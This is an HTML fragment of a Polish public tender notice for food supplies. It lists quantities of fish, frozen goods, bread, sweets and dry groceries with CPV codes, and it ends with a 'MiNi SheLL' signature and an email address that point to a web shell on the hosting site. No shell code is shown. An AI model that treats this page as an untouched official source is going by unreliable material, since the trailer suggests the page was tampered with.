<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mrożonek i konserw rybnych w asortymencie i ilości:1.	Śledź w pomidorach ( 170 g konserwa )	Szt.	200
2.	Śledź w oleju ( 170 g konserwa )	Szt.	200
3.	Szprot w pomidorach ( 170 g konserwa )	Szt.	250
4.	Szprot w oleju ( 170 g konserwa )	Szt.	200
5.	Filety z makreli ( 170 g konserwa )	Szt.	70
6.	Paprykarz szczeciński ( 300 g konserwa )	Szt.	100
7.	Tuńczyk (185g konserwa)	szt	100
8.	Fasolka szparagowa ( 400 g mrożona)	szt	90
9.	Kalafior ( 400 g mrożony)	szt	180
10.	Barszcz ukraiński( 450 g mrożony)	szt	72
11.	Płaty rybne mrożone filet- panga  	Kg	80
12.	Kości kulinarne mrożone 	Kg	50
13.	Wątróbka drobiowa mrożona	Kg	70
14.	Noga z kurczaka  mrożona (udka)	Kg 	250
15.	Kurczak 	kg	250
16.	Śledź w oleju 2.0 kg (wiadro)	Kg	50
17.	Kotlety rybne panierowane	kg	40
18	Mieszanka kompotowa 450g	szt	48
19	Bukiet jarzyn  450g.	szt	360
20	Dorsz  wędzony	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.10.00-3, 15.20.00.00-0, 15.33.10.70-9, 15.11.20.00-6, 15.23.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieczywa w asortymencie i ilości:1.	Chleb 950 g	Szt.	2830
2. 	Chleb razowy mieszany 750g	szt	1510
3.	Chleb owsiany 400g	szt	1130
4.	Babka drożdżowa 500g.	Szt 	40
5.	Bułka zwykła 100 g	Szt.	7000
6	Rogal słodki 100 g	Szt.	600
7	Drożdżówka 90g.	Szt	800
8	Kartoflaki 100g	szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wyrobó cukierniczych w asortymencie i ilości:1.	Herbatniki lekkie ciastka bez cukru(73 g paczki)	szt	250
2.	Wafelki bez cukru(70 g paczki)	szt	500
3.	Ciastka deserowe(75 g)	szt	250
4.	Czekolada bez cukru (80 g )	Szt.	36
5.	Czekolada (100 g )	Szt.	200
6.	Baton 35 g ( 7 days )	Szt.	600
7.	Listki waflowe b/c( 32 g )	Szt.	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> POZOSTAŁE RÓŻNE ARTYKUŁY SPOŻYWCZE, SYPKIE I DŻEMY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa różnych artykułó spożywczycxh, artykułó sypkich i dżemów w asortymencie i ilości:1.	Amoniak spożywczy( 25 g )	Szt.	2
2.	Herbata indyjska  100 g	Szt.	700
3.	Napój herbaciany  w granul. ( 300 g )	Szt.	50
4.	Sól kuchenna 1 kg	Kg	140
5.	Soda oczyszczona( 30 g )	Szt.	5
6.	Olej uniwersalny 1 l 	Szt.	70
7.	Olej uniwersalny 3 l 	Szt.	5
8.	Smalec kostka (250 g)	Kg	80
9.	Chrzan tarty( 270 g )	szt	50
10.	Kukurydza konserwowa ( 400 g )	szt	90
11.	Koncentrat pomidorowy 30 % (200g)	szt	100
12.	Pasztet drobiowy ( 290 g )	Szt.	400
13.	Groszek konserwowy( 400 g )	szt	70
14.	Papryka konserwowa 0.9l	Szt.	80
15.	Ogórki konserwowe( 0,9 l )	Szt.	70
16.	Cukier kryształ 1 kg	Kg	900 
17.	Cukier puder 0,5 kg	Kg	5
18.	Kakao naturalne 200 g	Szt.	5
19.	Rosół kostka ( 120 g )	Szt.	30
20.	Żurek śląski ( 46 g )	szt	60
21.	Zupa pieczarkowa( 59 g torebki )	szt	60
22.	Zupa grzybowa (42g torebki )	szt	80
23.	Zupa ogonowa(57g torebki )	szt	60
24.	Sos pieczarkowy (27 g )	Szt.	90
25.	Sos grzybowy(33 g  torebki)	Szt.	80
26.	Musztarda łagodna ( 470 g )	szt	160
27.	Majonez ( 0,9 l )	Szt.	25
28.	Ocet 10 %	L	15
29.	Przyprawa w płynie 0,9 l do zup	Szt.	60
30.	Przyprawa warzywna do zup w proszku 200g	szt	170
31.	Przyprawa do piernika (25 g )	Szt.	10
32.	Cynamon (20 g )	Szt.	10
33.	Papryka mielona słodka ( 20 g torebki )	szt	50
34.	Budyń różne smaki( 65 g torebki )	szt	350
35.	Ketchup( 500 g )	szt	230
36.	Kisiel różne smaki( 58 g torebki )	szt	100
37.	Kminek( 20 g torebki )	szt	50
38.	Kwasek cytrynowy ( 20 g torebki )	szt	60
39.	Pieprz naturalny mielony ( 20 g torebki )	szt	160
40.	Proszek do pieczenia( 18 g torebki )	Szt.	30
41.	Cukier waniliowy( 16 g torebki )	Szt.	40
42.	Majeranek( 10 g torebki )	Szt.	40
43.	Gałka muszkatołowa( 10 g torebki )	Szt.	25
44.	Ziele angielskie( 15 g torebki )	Szt.	60
45.	Liść laurowy ( 8 g torebki )	szt	60
46.	Mleko zagęszczone Słodzone (530g)	Szt.	80
47.	Wafle tortowe(200 g )	Szt.	80
48.	Galaretka owocowa (79 g )	Szt.	400
49.	Rodzynki  (100g )	Szt.	20
50.	Kokos  (100g )	Szt.	40
51.	Drożdże świeże	Kg	2
52.	Sok syrop 0.33l	szt	40
53.	Sok owocowy (0,33l)	szt	1000
54.	Sok owocowy b/c (0.30l) 	szt	150
55.	Konserwa tyrolska mięsna  300 g	Szt.	460
56.	Dżem wiśniowy ( 260 g słoik )	szt	200
57.	Dżem truskawkowy ( 260 g słoik )	szt	200
58.	Dżem czarna porzeczka (260g słoik)	szt	100
59.	Marmolada(0,9 l  ( słoik )	Szt.	30
60.	Mąka pszenna lux -poznańska 1 kg	Kg	250
61.	Mąka ziemniaczana( 0,5 kg )	Kg	5
62.	Kasza manna (0,5 kg )	Kg	40
63.	Kasza gryczana (0,5 kg )	Kg	80
64.	Kasza jęczmienna (0.5kg)	kg	160
65.	Makaron  świderki 	kg	250
66.	Makaron lubelski nitka (0,5kg)	kg	10
67.	Bułka tarta /0.50kg/	Kg	30
68.	Groch połówki (0,5 kg )	Kg	40
69.	Ryż (1 kg )	Kg	140
70.	Miód pszczeli naturalny ( 400g słoik)	szt	90
71.	Płatki owsiane 	kg	20
72.	Płatki kukurydziane 	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.22.00-6, 15.85.10.00-8, 15.43.00.00-1, 15.89.00.00-3, 15.13.10.00-5, 15.80.00.00-6, 15.33.22.90-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com